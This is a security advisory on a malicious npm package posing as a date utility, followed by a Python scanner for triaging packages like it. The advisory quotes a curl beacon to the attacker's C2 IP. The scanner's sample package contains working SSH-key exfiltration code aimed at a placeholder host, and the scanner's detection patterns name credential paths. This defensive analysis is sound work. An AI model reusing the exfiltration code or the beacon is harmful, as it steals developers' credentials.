CRITICAL npm Malware

Malicious code in houzidawang807 (npm)

MAL-2026-5731


Description


Source: amazon-inspector (7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489)

The package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates ~/.ssh for *.pub files, collects the installing user's username and platform, and POSTs the result as a JSON payload over HTTPS to the hardcoded bare IP 124.221.154.135; source comments explicitly label this destination as the attacker's C2 server. package.json additionally declares a build script that runs curl http://124.221.154.135/pre?h=$(hostname)&u=$(whoami), leaking the hostname and username over plaintext HTTP to the same C2.

The legitimate-looking surface is a 3-line formatDate wrapper in index.js; the rest of the package is attack tooling.

Although the malicious file is named postinstall.js, it is not currently wired into a lifecycle hook (scripts declares only build), so a default npm install does not auto-execute it. It still runs if anything requires the file directly, and invoking the declared build script fires the curl beacon. The file's name strongly suggests the author intends to enable it as a postinstall hook in a follow-up version, so treat every version of this package as malicious rather than relying on the hook being absent.
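The indicators above (a bare-IP destination, a shell script that interpolates $(hostname)/$(whoami), code that walks ~/.ssh, and a hook-named file that is not yet wired into scripts) can be checked mechanically before a package is allowed into a build. The following Python triage script is an added example, not the advisory's tooling and not code from the package: it runs those checks over a package.json and a map of file contents. The sample package it inspects is constructed to mirror the description, with the placeholder TEST-NET address 203.0.113.10 in place of the real C2 IP.

```python
import json
import re

# Constructed sample, modelled on the advisory's description; 203.0.113.10 is a
# placeholder (RFC 5737 TEST-NET), not the real C2 address.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-date-utils",
    "version": "1.0.0",
    "description": "a simple date formatting utility",
    "main": "index.js",
    "scripts": {
        "build": 'curl "http://203.0.113.10/pre?h=$(hostname)&u=$(whoami)"',
    },
})

SAMPLE_FILES = {
    "index.js": "module.exports.formatDate = (d) => d.toISOString().slice(0, 10);\n",
    "postinstall.js": (
        "const fs = require('fs'); const os = require('os'); const path = require('path');\n"
        "const https = require('https');\n"
        "const dir = path.join(os.homedir(), '.ssh');\n"
        "const keys = fs.readdirSync(dir).filter(f => f.endsWith('.pub'))\n"
        "  .map(f => fs.readFileSync(path.join(dir, f), 'utf8'));\n"
        "const body = JSON.stringify({u: os.userInfo().username, p: process.platform, keys});\n"
        "https.request({host: '203.0.113.10', method: 'POST', path: '/c2'}).end(body);\n"
    ),
}

# npm lifecycle hooks that run automatically on install/publish.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
BARE_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SENSITIVE_PATHS = re.compile(r"\.ssh|\.aws|\.npmrc|\.gnupg|\.docker/config\.json")
SHELL_ENUM = re.compile(r"\$\((?:hostname|whoami|id|uname)[^)]*\)")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
NET_CALLS = re.compile(r"\b(?:https?\.request|fetch|axios|net\.connect|child_process|exec(?:Sync)?|spawn)\b")


def _bare_ips(text):
    """Literal IPv4 addresses in text, ignoring loopback and the unspecified address."""
    return [ip for ip in BARE_IPV4.findall(text)
            if not ip.startswith("127.") and ip != "0.0.0.0"]


def audit_package(package_json, files):
    """Return a list of {rule, where, evidence} findings for one package."""
    findings = []
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts", {})

    for name, cmd in scripts.items():
        if name in LIFECYCLE_HOOKS:
            findings.append({"rule": "lifecycle-hook", "where": name, "evidence": cmd})
        for ip in _bare_ips(cmd):
            findings.append({"rule": "script-bare-ip", "where": name, "evidence": ip})
        if SHELL_ENUM.search(cmd):
            findings.append({"rule": "script-host-enum", "where": name, "evidence": SHELL_ENUM.search(cmd).group()})
        if DOWNLOADER.search(cmd):
            findings.append({"rule": "script-downloader", "where": name, "evidence": DOWNLOADER.search(cmd).group()})

    for fname, src in files.items():
        for ip in _bare_ips(src):
            findings.append({"rule": "source-bare-ip", "where": fname, "evidence": ip})
        if SENSITIVE_PATHS.search(src):
            findings.append({"rule": "source-sensitive-path", "where": fname, "evidence": SENSITIVE_PATHS.search(src).group()})
        if NET_CALLS.search(src):
            findings.append({"rule": "source-network", "where": fname, "evidence": NET_CALLS.search(src).group()})
        # A file named after a lifecycle hook that scripts does not (yet) reference:
        # dormant today, one package.json edit away from running on every install.
        stem = fname.rsplit("/", 1)[-1].removesuffix(".js")
        if stem in LIFECYCLE_HOOKS and stem not in scripts:
            findings.append({"rule": "dormant-hook-file", "where": fname, "evidence": stem})
    return findings


def verdict(findings):
    """'block' when credential access and a network sink co-occur, 'review' for any other hit."""
    rules = {f["rule"] for f in findings}
    exfil_sinks = {"source-bare-ip", "script-bare-ip", "source-network", "script-downloader"}
    if "source-sensitive-path" in rules and rules & exfil_sinks:
        return "block"
    return "review" if findings else "clean"


if __name__ == "__main__":
    hits = audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES)
    for h in hits:
        print(f"{h['rule']:22} {h['where']:16} {h['evidence']}")
    print("verdict:", verdict(hits))
```

Run it against an unpacked tarball (npm pack, then read package.json and each .js file into the dict) before the package is installed; installing with --ignore-scripts only suppresses the hooks and does nothing about a file that consumer code requires directly.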
